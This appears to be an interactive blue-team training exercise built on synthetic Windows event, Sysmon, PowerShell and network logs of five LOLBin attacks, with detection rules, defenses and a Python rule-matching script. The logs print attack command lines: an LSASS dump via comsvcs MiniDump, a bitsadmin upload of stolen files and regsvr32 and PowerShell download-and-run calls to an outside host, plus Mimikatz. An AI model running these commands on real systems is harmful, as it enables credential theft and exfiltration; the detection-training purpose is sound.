🔍 The Invisible Adversary: 5 LOLBin Attacks
⚠️ SYNTHETIC SCENARIO: All logs, IPs, and IOCs are fictional and created for training purposes only.
📋 Scenario
Company: TechCorp Industries (Fictional)
Alert: Behavioral analytics detected anomalous activity across workstations using only built-in Windows tools
Your Mission: Identify 5 different LOLBin-based attacks hidden in the logs. No custom malware was used—only legitimate Windows binaries.
🎯 What are LOLBins?
Living Off The Land Binaries (LOLBins) are legitimate, digitally signed Windows executables that attackers abuse to:
- Bypass antivirus and EDR detection (clean signatures)
- Execute malicious actions without dropping files
- Blend in with normal system activity
- Avoid behavioral alerts (trusted processes)
🎮 How to Play
- Review logs in all 6 evidence tabs
- Answer questions about each attack technique
- Watch malicious logs highlight in red after correct answers
- Complete all 5 tasks to unlock the full attack summary
📊 Evidence Analysis
Windows Security Event Log:
2025-11-26T08:15:23 [Event 4688] Process Created | Computer: WKS-SALES-42 | User: john.doe | Process: C:\Windows\System32\rundll32.exe | CommandLine: rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 724 C:\temp\debug.bin full | Parent: C:\Windows\System32\cmd.exe
2025-11-26T08:15:22 [Event 4672] Special Privileges Assigned | User: john.doe | Privileges: SeDebugPrivilege
2025-11-26T08:16:10 [Event 4624] Successful Logon | User: john.doe | LogonType: 2 (Interactive) | Workstation: WKS-SALES-42
2025-11-26T08:22:15 [Event 4688] Process Created | Computer: WKS-SALES-42 | User: john.doe | Process: C:\Windows\System32\schtasks.exe | CommandLine: schtasks /create /tn "WindowsUpdateCheck" /tr "mshta vbscript:Execute(...)" /sc daily /st 09:00 /ru SYSTEM
2025-11-26T08:22:16 [Event 4698] Scheduled Task Created | TaskName: \WindowsUpdateCheck | User: john.doe | Action: mshta.exe with vbscript payload
2025-11-26T08:30:45 [Event 4688] Process Created | Computer: WKS-SALES-42 | User: john.doe | Process: C:\Windows\System32\certutil.exe | CommandLine: certutil -encode C:\Users\john.doe\Documents\data.zip C:\temp\encoded.txt
2025-11-26T08:31:10 [Event 4688] Process Created | Computer: WKS-SALES-42 | User: john.doe | Process: C:\Windows\System32\bitsadmin.exe | CommandLine: bitsadmin /transfer exfilJob http://203.0.113.45/upload.php C:\temp\encoded.txt
2025-11-26T08:45:33 [Event 4688] Process Created | Computer: WKS-SALES-42 | User: john.doe | Process: C:\Windows\System32\wbem\WMIC.exe | CommandLine: wmic /node:10.20.30.50 process call create "powershell -NoP -W Hidden -Enc SQBFAFg..."
2025-11-26T08:45:35 [Event 4624] Network Logon | Computer: WKS-IT-50 | User: admin.smith | LogonType: 3 (Network) | Source: 10.20.30.42 (WKS-SALES-42)
2025-11-26T09:05:12 [Event 4688] Process Created | Computer: WKS-IT-50 | User: admin.smith | Process: C:\Windows\System32\regsvr32.exe | CommandLine: regsvr32 /s /u /i:http://203.0.113.45/payload.sct scrobj.dll
2025-11-26T09:05:15 [Event 4688] Process Created | Computer: WKS-IT-50 | User: admin.smith | Process: C:\Windows\System32\mshta.exe | Parent: C:\Windows\System32\regsvr32.exe | CommandLine: mshta.exe javascript:eval("var s=new ActiveXObject...")
Sysmon Operational Log:
Event 10: ProcessAccess | Time: 2025-11-26T08:15:23.567Z | SourceImage: C:\Windows\System32\rundll32.exe | TargetImage: C:\Windows\System32\lsass.exe | GrantedAccess: 0x1FFFFF (PROCESS_ALL_ACCESS) | CallTrace: comsvcs.dll+0x6fa00
Event 11: FileCreate | Time: 2025-11-26T08:15:24.890Z | Image: C:\Windows\System32\rundll32.exe | TargetFilename: C:\temp\debug.bin | Size: 52,428,800 bytes
Event 1: ProcessCreate | Time: 2025-11-27T09:00:05.123Z | Image: C:\Windows\System32\mshta.exe | ParentImage: C:\Windows\System32\taskeng.exe | User: NT AUTHORITY\SYSTEM | CommandLine: mshta.exe vbscript:Execute(...)
Event 3: NetworkConnect | Time: 2025-11-26T08:30:47.456Z | Image: C:\Windows\System32\certutil.exe | DestinationIp: 203.0.113.45 | DestinationPort: 80
Event 1: ProcessCreate | Time: 2025-11-26T08:31:10.678Z | Image: C:\Windows\System32\bitsadmin.exe | CommandLine: bitsadmin /transfer exfilJob http://203.0.113.45/upload.php
Event 3: NetworkConnect | Time: 2025-11-26T08:45:34.012Z | Image: C:\Windows\System32\wbem\WMIC.exe | DestinationIp: 10.20.30.50 | DestinationPort: 135 (RPC)
Event 1: ProcessCreate | Time: 2025-11-26T08:45:35.345Z | Computer: WKS-IT-50 | Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe | User: TECHCORP\admin.smith
Event 3: NetworkConnect | Time: 2025-11-26T09:05:13.234Z | Image: C:\Windows\System32\regsvr32.exe | DestinationIp: 203.0.113.45 | DestinationPort: 80
Event 1: ProcessCreate | Time: 2025-11-26T09:05:15.890Z | Image: C:\Windows\System32\mshta.exe | ParentImage: C:\Windows\System32\regsvr32.exe | CommandLine: mshta.exe javascript:eval(...)
PowerShell Script Block Logging (Event 4104):
# Event 4104 - Script Block Logging
# Time: 2025-11-26T08:16:45
# Computer: WKS-SALES-42
$dumpFile = "C:\temp\debug.bin"
$bytes = [System.IO.File]::ReadAllBytes($dumpFile)
# Processing LSASS dump offline...
# Event 4104
# Time: 2025-11-26T08:45:36
# Computer: WKS-IT-50
# Decoded WMI payload:
IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.45/stage1.ps1')
# Execute Mimikatz in memory
Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords"
# Event 4104
# Time: 2025-11-26T09:05:17
# Computer: WKS-IT-50
# Encrypted C2 stager
$wc = New-Object System.Net.WebClient
$data = $wc.DownloadData('http://203.0.113.45:8080/stage2')
$key = [Text.Encoding]::ASCII.GetBytes('key12345')
# Decrypt and execute in memory...
# Event 4104
# Time: 2025-11-27T09:00:06
# Computer: WKS-SALES-42
# User: NT AUTHORITY\SYSTEM
# Persistence payload from scheduled task
$c = New-Object -ComObject MSScriptControl.ScriptControl
$c.Language = 'VBScript'
$c.AddCode('CreateObject("Wscript.Shell").Run "powershell -NoP -W Hidden..."')
Network Capture:
08:15:10 | 10.20.30.42:49152 -> 10.20.10.5:445 | SMB | Tree Connect: \\DC01\IPC$
08:30:47 | 10.20.30.42:49234 -> 203.0.113.45:80 | HTTP GET /download/cert_bypass.txt
08:31:11 | 10.20.30.42:49235 -> 203.0.113.45:80 | HTTP POST /upload.php
    Content-Type: application/octet-stream
    Content-Length: 524288 bytes
    User-Agent: Microsoft BITS/7.5
08:45:33 | 10.20.30.42:49301 -> 10.20.30.50:135 | RPC Endpoint Mapper Request
08:45:34 | 10.20.30.42:49302 -> 10.20.30.50:49667 | DCOM IWbemServices::ExecMethod
    Method: Win32_Process.Create
    CommandLine: powershell -NoP -W Hidden...
08:45:36 | 10.20.30.50:49700 -> 203.0.113.45:443 | TLS Client Hello
09:05:13 | 10.20.30.50:49750 -> 203.0.113.45:80 | HTTP GET /payload.sct
    User-Agent: regsvr32/1.0
09:05:17 | 10.20.30.50:49752 -> 203.0.113.45:8080 | HTTP POST /c2/beacon
    Encrypted payload (C2 callback)
File System and Registry Activity:
[File Created] 2025-11-26T08:15:24 | Path: C:\temp\debug.bin | Size: 52,428,800 bytes (50 MB) | Description: LSASS memory dump | Owner: TECHCORP\john.doe
[File Modified] 2025-11-26T08:22:16 | Path: C:\Windows\System32\Tasks\WindowsUpdateCheck | Content: Scheduled task XML with mshta.exe payload
[File Created] 2025-11-26T08:28:30 | Path: C:\Users\john.doe\Documents\data.zip | Size: 5,242,880 bytes (5 MB) | Contents: Financial_Q4.xlsx, Passwords.txt
[File Created] 2025-11-26T08:30:46 | Path: C:\temp\encoded.txt | Size: 7,340,032 bytes (base64 encoded) | Tool: certutil.exe
[File Deleted] 2025-11-26T08:32:15 | Path: C:\temp\encoded.txt | Process: cmd.exe (cleanup)
[File Created] 2025-11-26T08:46:12 | Computer: WKS-IT-50 | Path: C:\temp\creds.txt | Content: Mimikatz output - credentials
[Registry Modified] 2025-11-26T09:05:14 | Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run | Value: "SecurityUpdate" = "regsvr32 /s /u /i:http://203.0.113.45/payload.sct scrobj.dll"
Behavioral Analytics (UEBA) Alerts:
🚨 HIGH SEVERITY ALERTS: 5
⚠️ MEDIUM SEVERITY: 8
ℹ️ LOW SEVERITY: 12
User: john.doe | Anomaly: PowerShell accessing LSASS (NEVER seen) | Risk Score: 95/100 (CRITICAL)
Rare Process Chain: cmd.exe → schtasks.exe → Task with mshta payload | Frequency: 0.01% of all processes
External Connection (Non-Whitelisted): 203.0.113.45:80 - 15 connections | First Seen: 2025-11-26 08:30:47 | Reputation: UNKNOWN
User: admin.smith | Anomaly: Logged in from WKS-SALES-42 (NEVER authorized) | Risk Score: 88/100 (CRITICAL)
Suspicious Process Chain: regsvr32.exe → mshta.exe → powershell.exe | Frequency: 0.005% (Defense Evasion)
Timeline Correlation: 08:15 ▶ Credential Dump → 08:22 ▶ Persistence → 08:30 ▶ Exfil → 08:45 ▶ Lateral → 09:05 ▶ Evasion
Total Attack Duration: 50 minutes (FAST ATTACK)
📝 Investigation Tasks
Complete all 5 tasks to unlock the attack summary and detailed explanations.
Attack #1: Credential Dumping
Question: Which LOLBin and DLL combination was used to dump LSASS memory?
Attack #2: Persistence
Question: What persistence mechanism was used?
Follow-up: What is the name of the malicious scheduled task?
Attack #3: Data Exfiltration
Question: Select ALL LOLBins used for data exfiltration:
Attack #4: Lateral Movement
Question: Which LOLBin was used for remote code execution on another workstation?
💡 Hint: Check Windows Events around 08:45 AM for remote execution
Attack #5: Defense Evasion
Question: Identify the defense evasion process chain. What spawned what?
🎯 Complete Attack Analysis
📅 Attack Timeline & Techniques
08:15 AM - Credential Dumping (T1003.001)
What Happened: The attacker used rundll32.exe to call the MiniDump export of comsvcs.dll (the COM+ Services DLL), which writes the LSASS process memory to C:\temp\debug.bin.
Why It's Malicious:
- LSASS contains Kerberos tickets, NTLM hashes, and plaintext passwords
- rundll32.exe accessing LSASS with PROCESS_ALL_ACCESS is extremely suspicious
- SeDebugPrivilege was assigned (required for LSASS access)
- 50 MB dump file created in temp directory (typical LSASS size)
Detection: Monitor for rundll32.exe accessing lsass.exe with comsvcs.dll in command line
08:22 AM - Persistence via Scheduled Task (T1053.005)
What Happened: The attacker created a scheduled task named "WindowsUpdateCheck" (mimicking a legitimate update task) that runs mshta.exe with a VBScript payload daily at 9:00 AM as SYSTEM.
Why It's Malicious:
- Task runs as NT AUTHORITY\SYSTEM (highest privileges)
- Uses mshta.exe to execute encoded VBScript (evasion technique)
- Name "WindowsUpdateCheck" designed to blend in with legitimate tasks
- Downloads additional payloads from attacker server at 203.0.113.45
Detection: Alert on scheduled tasks created with mshta.exe, regsvr32.exe, or encoded scripts
08:30 AM - Data Staging & Exfiltration (T1048.003)
What Happened: The attacker used certutil.exe to Base64-encode sensitive data (a 5 MB archive), then used bitsadmin.exe (the Windows BITS service) to upload it to the attacker's server.
Why It's Malicious:
- certutil.exe used to encode data (evades DLP that only inspects unencoded content)
- BITS service abused for stealthy data transfer (resumes on network interruption)
- External connection to 203.0.113.45 (unknown, non-whitelisted IP)
- File deleted after upload (anti-forensics)
- 524 KB uploaded containing financial data and passwords
Detection: Monitor certutil.exe with -encode/-decode flags, BITS jobs to external IPs
08:45 AM - Lateral Movement via WMI (T1047)
What Happened: Used wmic.exe to remotely execute PowerShell on workstation WKS-IT-50 (10.20.30.50), launching Mimikatz in memory to dump more credentials.
Why It's Malicious:
- WMI remote process creation from non-admin workstation (unusual)
- PowerShell spawned from WmiPrvSE.exe (WMI Provider Host) indicates remote execution
- admin.smith credentials used from unauthorized location (WKS-SALES-42)
- Encoded PowerShell command (obfuscation)
- Downloaded and executed Mimikatz in memory (fileless attack)
Detection: Alert on wmic.exe with /node parameter, PowerShell parent = WmiPrvSE.exe
09:05 AM - Defense Evasion Chain (T1218.010)
What Happened: The attacker used the "Squiblydoo" technique: regsvr32.exe fetched a remote scriptlet (.sct file), which spawned mshta.exe to run JavaScript that launched the PowerShell C2 stager.
Why It's Malicious:
- regsvr32.exe downloading from internet (not typical usage)
- Abnormal process chain: regsvr32 → mshta → powershell (multi-stage evasion)
- User-Agent "regsvr32/1.0" in HTTP request (indicates abuse)
- Persistence added via registry Run key (survives reboots)
- Encrypted C2 communication to 203.0.113.45:8080
Detection: Monitor regsvr32.exe with /i: and http:// in command line, unusual parent-child relationships
🔬 Why These Logs Are Malicious: Behavioral Indicators
🚨 Key Detection Points:
- Abnormal Parent-Child Relationships: rundll32→lsass (process access), taskeng→mshta, WmiPrvSE→powershell, regsvr32→mshta
- LOLBins Making Network Connections: certutil, regsvr32, mshta connecting to external IPs
- Command-Line Anomalies: Base64 encoding, /i:http://, comsvcs.dll MiniDump, /node parameter
- Privilege Escalation: SeDebugPrivilege assignment, SYSTEM scheduled tasks
- Rapid Attack Progression: 5 different techniques in 50 minutes (automated/scripted)
- Anti-Forensics: File deletion, registry modification, memory-only payloads
🛡️ Comprehensive Defense Strategy
🚨 Immediate Response
- Isolate WKS-SALES-42 and WKS-IT-50 from network
- Disable john.doe and admin.smith accounts
- Block 203.0.113.45 at firewall
- Delete malicious scheduled task
- Force password resets for all users
- Scan for additional compromised systems
🔧 Technical Controls
- Enable LSASS Protection (RunAsPPL)
- Enable Credential Guard
- Deploy Attack Surface Reduction rules
- Block WMI remote execution (unless needed)
- Restrict BITS service to demand-start
- Enable PowerShell logging (Module + ScriptBlock)
📊 Detection Rules
- Sysmon: Monitor all LSASS access
- Alert: rundll32.exe + comsvcs.dll + MiniDump
- Alert: Scheduled tasks with LOLBins
- Alert: certutil -encode/-decode
- Alert: BITS jobs to external IPs
- Alert: wmic /node remote execution
- Alert: regsvr32 /i:http://
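The detection rules above, together with the abnormal parent-child pairs from Key Detection Points, expressed as a small rule engine and run over log lines. This is an added example, not the challenge's own tooling: the field names follow the evidence tabs, while the RFC1918 "internal" test and the sample lines (modelled on the scenario) are assumptions.

```python
import re

# Added example, not the page's own tooling: detection rules for the five LOLBin patterns
# above, run over flattened "key: value" event lines with or without the " | " separator.

def parse_event(line):  # lower-cased basename of image and parent, plus the command line
    pats = {"image": r"(?<!Parent)(?:Process|Image): (\S+)",
            "parent": r"Parent(?:Image)?: (\S+)",
            "cmd": r"CommandLine: (.*?)(?= \| \w+: | Parent(?:Image)?: |$)"}
    f = {k: (m.group(1).lower() if (m := re.search(p, line)) else "") for k, p in pats.items()}
    return {k: (v if k == "cmd" else v.rsplit("\\", 1)[-1]) for k, v in f.items()}

def is_external(url):
    """True unless the URL host sits in RFC1918 space (assumed to mean 'internal')."""
    host = re.sub(r"^\w+://", "", url).split("/")[0].split(":")[0]
    octet2 = re.match(r"172\.(\d+)\.", host)
    return not (host.startswith(("10.", "192.168."))
                or (octet2 and 16 <= int(octet2.group(1)) <= 31))

RULES = [  # (image basename, regex over the lower-cased command line, finding)
    ("rundll32.exe", r"comsvcs\.dll.*minidump", "T1003.001 LSASS dump via comsvcs MiniDump"),
    ("schtasks.exe", r"/create.*(mshta|regsvr32|-enc)", "T1053.005 scheduled task running a LOLBin"),
    ("certutil.exe", r"-(encode|decode)\b", "T1048.003 certutil encoding staged data"),
    ("wmic.exe", r"/node:", "T1047 WMI remote process creation"),
    ("regsvr32.exe", r"/i:http", "T1218.010 regsvr32 remote scriptlet (Squiblydoo)"),
]
ODD_PARENTS = {("taskeng.exe", "mshta.exe"), ("wmiprvse.exe", "powershell.exe"),
               ("regsvr32.exe", "mshta.exe")}  # parent -> child pairs the page calls abnormal

def classify(line):
    """Return every finding that fires for one event line (empty list = benign)."""
    e = parse_event(line)
    hits = [msg for img, rx, msg in RULES if e["image"] == img and re.search(rx, e["cmd"])]
    urls = re.findall(r"https?://[^\s\"']+", e["cmd"])
    if e["image"] == "bitsadmin.exe" and "/transfer" in e["cmd"] and any(map(is_external, urls)):
        hits.append("T1048.003 BITS transfer to external host")  # internal targets stay quiet
    if (e["parent"], e["image"]) in ODD_PARENTS:
        hits.append(f"abnormal chain {e['parent']} -> {e['image']}")
    return hits

def scan(lines):  # line index -> findings, for every line that fired at least one rule
    return {i: hits for i, line in enumerate(lines) if (hits := classify(line))}

SAMPLE_LOG = [  # constructed lines modelled on the scenario's events (fictional values)
    "Process: C:\\Windows\\System32\\rundll32.exe | CommandLine: rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 724 C:\\temp\\debug.bin full | Parent: C:\\Windows\\System32\\cmd.exe",
    "Process: C:\\Windows\\System32\\bitsadmin.exe | CommandLine: bitsadmin /transfer exfilJob http://203.0.113.45/upload.php C:\\temp\\encoded.txt | Parent: C:\\Windows\\System32\\cmd.exe",
    "Process: C:\\Windows\\System32\\bitsadmin.exe | CommandLine: bitsadmin /transfer patch http://10.20.10.5/kb.msu C:\\temp\\kb.msu | Parent: C:\\Windows\\System32\\cmd.exe",
    "Image: C:\\Windows\\System32\\mshta.exe | ParentImage: C:\\Windows\\System32\\regsvr32.exe | CommandLine: mshta.exe javascript:eval(...)",
]
```

The third sample line is a BITS transfer from an internal host and produces no finding, which is the point of the RFC1918 check: the rule keys on the destination, not on bitsadmin itself.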
🎓 What You Learned
LOLBin attacks are difficult to detect because:
- ✅ Signed Binaries: All tools are Microsoft-signed, pass signature checks
- ✅ Clean File Hashes: No malware files to scan, everything in memory
- ✅ Legitimate Functions: Each tool performs its intended function (just abused)
- ❌ Behavioral Anomalies: Detection relies on understanding NORMAL vs ABNORMAL usage
Key Takeaway: Focus on context, relationships, and behavior rather than file signatures alone!
🎉 Challenge Completed!
You've successfully identified all 5 LOLBin attacks and understand why they're malicious.